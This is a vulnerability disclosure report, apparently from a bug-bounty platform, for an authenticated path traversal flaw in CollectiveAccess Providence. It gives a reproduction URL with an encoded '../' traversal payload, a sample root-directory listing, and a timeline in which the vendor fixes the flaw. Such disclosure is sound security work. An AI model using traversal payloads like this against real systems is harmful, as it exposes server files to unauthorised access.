Partial Local file inclusion in collectiveaccess/providence

Valid

Reported on

May 25th 2023


Description

An authenticated user can extend the range of the web application's folder context and can dig out to OS level.

To reproduce the issue, please authenticate to the web application, and simply open the following URL in the browser: https://demo.collectiveaccess.org/batch/MediaImport/GetDirectoryLevel?id=%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F&init=&start=0&max=100

This request contains a response with the / folder's contents.


{"\/|6":{"001":{"item_id":"001","name":"001","fullname":"001","type":"DIR","children":1,"files":0,"subdirectories":1},"bin":{"item_id":"bin","name":"bin","fullname":"bin","type":"DIR","children":1161,"files":1161,"subdirectories":0},"boot":{"item_id":"boot","name":"boot","fullname":"boot","type":"DIR","children":22,"files":18,"subdirectories":4},"carleton":{"item_id":"carleton","name":"carleton","fullname":"carleton","type":"DIR","children":0,"files":0,"subdirectories":0},"data":{"item_id":"data","name":"data","fullname":"data","type":"DIR","children":86,"files":2,"subdirectories":84},"dev":{"item_id":"dev","name":"dev","fullname":"dev","type":"DIR","children":196,"files":176,"subdirectories":20},"dips":{"item_id":"dips","name":"dips","fullname":"dips","type":"DIR","children":4,"files":1,"subdirectories":3},"etc":{"item_id":"etc","name":"etc","fullname":"etc","type":"DIR","children":229,"files":109,"subdirectories":120},"home":{"item_id":"home","name":"home","fullname":"home","type":"DIR","children":12,"files":0,"subdirectories":12},"keybase":{"item_id":"keybase","name":"keybase","fullname":"keybase","type":"DIR","children":0,"files":0,"subdirectories":0},"lib":{"item_id":"lib","name":"lib","fullname":"lib","type":"DIR","children":43,"files":4,"subdirectories":39},"lib64":{"item_id":"lib64","name":"lib64","fullname":"lib64","type":"DIR","children":1433,"files":1360,"subdirectories":73},"magic":{"item_id":"magic","name":"magic","fullname":"magic","type":"FILE"},"media":{"item_id":"media","name":"media","fullname":"media","type":"DIR","children":0,"files":0,"subdirectories":0},"mnt":{"item_id":"mnt","name":"mnt","fullname":"mnt","type":"DIR","children":0,"files":0,"subdirectories":0},"nas":{"item_id":"nas","name":"nas","fullname":"nas","type":"DIR","children":22,"files":5,"subdirectories":17},"opt":{"item_id":"opt","name":"opt","fullname":"opt","type":"DIR","children":3,"files":0,"subdirectories":3},"proc":{"item_id":"proc","name":"proc","fullname":"proc","type":"DIR","children":316,"files":46,"subdirectories":270},"root":{"item_id":"root","name":"root","fullname":"root","type":"DIR","children":0,"files":0,"subdirectories":0},"run":{"item_id":"run","name":"run","fullname":"run","type":"DIR","children":51,"files":16,"subdirectories":35},"sbin":{"item_id":"sbin","name":"sbin","fullname":"sbin","type":"DIR","children":509,"files":509,"subdirectories":0},"srv":{"item_id":"srv","name":"srv","fullname":"srv","type":"DIR","children":0,"files":0,"subdirectories":0},"ssd":{"item_id":"ssd","name":"ssd","fullname":"ssd","type":"DIR","children":1,"files":0,"subdirectories":1},"sys":{"item_id":"sys","name":"sys","fullname":"sys","type":"DIR","children":11,"files":0,"subdirectories":11},"thunderbolt":{"item_id":"thunderbolt","name":"thunderbolt","fullname":"thunderbolt","type":"DIR","children":70,"files":16,"subdirectories":54},"tmp":{"item_id":"tmp","name":"tmp","fullname":"tmp","type":"DIR","children":44,"files":44,"subdirectories":0},"upload":{"item_id":"upload","name":"upload","fullname":"upload","type":"DIR","children":2,"files":0,"subdirectories":2},"usr":{"item_id":"usr","name":"usr","fullname":"usr","type":"DIR","children":12,"files":0,"subdirectories":12},"var":{"item_id":"var","name":"var","fullname":"var","type":"DIR","children":22,"files":0,"subdirectories":22},"web":{"item_id":"web","name":"web","fullname":"web","type":"DIR","children":86,"files":2,"subdirectories":84},"_primaryKey":"name","_itemCount":60}}

Impact

Exploitation of this vulnerability could result in access to OS level resources.

We are processing your report and will contact the collectiveaccess/providence team within 24 hours. 4 months ago
We have contacted a member of the collectiveaccess/providence team and are waiting to hear back 4 months ago
CollectiveAccess validated this vulnerability 4 months ago

Wow, thanks for raising this one. I can't believe we missed it. Will push a fix for it later today.

TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
CollectiveAccess marked this as fixed in develop with commit 6afb98 4 months ago
CollectiveAccess has been awarded the fix bounty
This vulnerability will not receive a CVE
CollectiveAccess published this vulnerability 4 months ago
to join this conversation